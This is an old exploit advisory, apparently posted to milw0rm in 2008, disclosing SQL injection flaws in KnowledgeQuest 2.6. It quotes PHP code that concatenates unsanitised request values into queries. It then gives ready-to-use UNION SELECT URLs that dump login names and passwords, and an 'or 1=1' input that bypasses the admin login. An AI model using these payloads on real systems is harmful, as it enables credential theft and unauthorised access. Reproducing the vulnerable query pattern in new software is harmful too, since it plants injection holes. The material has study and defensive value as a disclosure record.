KnowledgeQuest 2.6 SQL Injection Vulnerabilities :

Date : 2008-04-09 Author : Virangar Security
             ########################################################################
             #                                                                      #
             #    ...:::::KnowledgeQuest 2.6 SQL Injection Vulnerabilities ::::.... #           
             ########################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-------
vuln code in articletext.php:
line 13: $kqid = $HTTP_GET_VARS["kqid"];
......
line 17: $result = mysql_query("select DATE_FORMAT(postdate,'%m-%d-%y') as  postdate, DATE_FORMAT(reveiwdate,'%m-%d-%y') as reveiwdate, categoryid,title,text, attach, kqid, authorid from knowledgebase where kqid=" .$kqid.mysql_error());
###########
vuln code in articletextonly.php:
line 13: $kqid = $HTTP_GET_VARS["kqid"];
......
line 17:$result = mysql_query("select * from knowledgebase where kqid=" .$kqid.mysql_error());
--------
Exploits:
http://www.site.com/[patch]/articletextonly.php?kqid=-9999/**/union/**/select/**/1,2,3,loginid,password,6,7,8,9,10,11/**/from/**/login/*
http://www.site.com/[patch]/articletext.php?kqid=-999/**/union/**/select/**/1,2,3,loginid,password,6,7,8/**/from/**/login/*
--------------------------------
                                .::::admin Authentication bypass vuln::::.
vuln code in logincheck.php:
if(!empty($_POST['username']))
    {
        $username = $_POST['username'];
    }

    if(!empty($_POST['password']))
    {
        $password = $_POST['password'];
    }
...
...
...
$sql = "select * from login where loginid='". $username ."' and password='". $password . "'";
-----
Exploit:
User Name:admin ' or 1=1/*
Password :[whatever]
//you must login in administratorlogin.php ;)
--------------
young iranian h4ck3rz

# milw0rm.com [2008-04-09]

C1

 

C2

 

C3